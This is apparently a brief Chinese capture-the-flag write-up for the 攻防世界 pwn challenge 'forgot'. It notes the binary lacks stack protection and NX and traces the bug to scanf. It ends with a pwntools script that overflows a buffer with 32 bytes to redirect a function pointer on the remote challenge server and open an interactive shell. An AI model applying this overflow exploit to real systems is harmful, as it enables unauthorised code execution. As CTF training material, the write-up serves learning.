攻防世界(14):forgot

查壳，没开栈保护和NX

这个题目的ida变量有点多，慢慢读

fgets没啥漏洞，原来漏洞在scanf这里

然后查找有没有system函数，没有需要利用第一个fgets写，但这里还是有的，把v3改成我们需要的函数名即可

exp

#!/usr/bin/env python
from pwn import *
p=remote('111.200.241.244', 51696)
p.recvuntil(">")
p.sendline('123')
payload='A'*32+p32(0x080486cc)
p.recvuntil(">")
p.sendline(payload)

p.interactive()